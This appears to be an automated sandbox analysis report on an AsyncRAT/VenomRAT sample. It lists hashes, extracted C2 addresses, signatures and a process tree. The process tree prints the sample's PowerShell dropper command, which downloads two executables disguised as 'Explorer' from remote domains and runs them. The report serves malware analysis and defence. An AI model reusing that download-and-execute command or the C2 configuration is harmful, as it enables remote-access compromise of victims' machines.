Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
  • submitted
    18-08-2024 19:02

General

  • Target

    d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe

  • Size

    75KB

  • MD5

    6c86e854bfcffef8c6b156ff59c5d6d3

  • SHA1

    8f9bd0ba4912b99de55922c91919a4df106d2278

  • SHA256

    d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a

  • SHA512

    b03618095eb784422bb3ae600784e087cc517139cdd5bb5b93ba25d9f69e1e7da844ea779b7056e5a9b5c015ca706b55b502128224804c29fab7cd6a56be1fbf

  • SSDEEP

    1536:02kU8UnRCE8PMRkkUJy8jd1bK/K9Ina4kzkLLVclN:0vUJR6PMRkHJ9d1bK3a4kiBY

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://xcu.exgaming.click

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://xcu5.exgaming.click

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

C2

109.38.143.137:8888

89.99.115.113:8888

192.168.178.69:8888

Mutex

zwkzzurhbadjvo

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is a remote access tool written in C#, designed to remotely monitor and control other computers.

  • VenomRAT 1 IoCs

    Detects VenomRAT.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 45 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe
    "C:\Users\Admin\AppData\Local\Temp\d000032653fce6a63cb46dc3d2bd11f3e5b8c7a9bc99e9ecb2d53be94ae9789a.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2692
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2904
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2572
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2996
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2792
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2372

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    346d17493b278f8aaa41fc2cfe23ffe1

    SHA1

    a5634365f5d36eac142ee28b8c7ad5c684bbff69

    SHA256

    ef27c2ecb1dc622457e1eb280b111b8df1ade1c6f1b71e586cab1147bc746858

    SHA512

    611afa640e3b9811181bf7b543a8641f6b00bae886c3d10df6b05882c2882437dc6c1d999aa8ac47ffb2592bffac643e9925f9fec711667417b89f541e82d604

  • memory/2572-8-0x000000001B670000-0x000000001B952000-memory.dmp

    Filesize

    2.9MB

  • memory/2572-9-0x0000000002860000-0x0000000002868000-memory.dmp

    Filesize

    32KB

  • memory/2692-0-0x000007FEF5A73000-0x000007FEF5A74000-memory.dmp

    Filesize

    4KB

  • memory/2692-1-0x0000000001050000-0x0000000001068000-memory.dmp

    Filesize

    96KB

  • memory/2692-7-0x000007FEF5A70000-0x000007FEF645C000-memory.dmp

    Filesize

    9.9MB

  • memory/2692-22-0x000007FEF5A70000-0x000007FEF645C000-memory.dmp

    Filesize

    9.9MB

  • memory/2996-15-0x000000001B640000-0x000000001B922000-memory.dmp

    Filesize

    2.9MB

  • memory/2996-16-0x0000000002240000-0x0000000002248000-memory.dmp

    Filesize

    32KB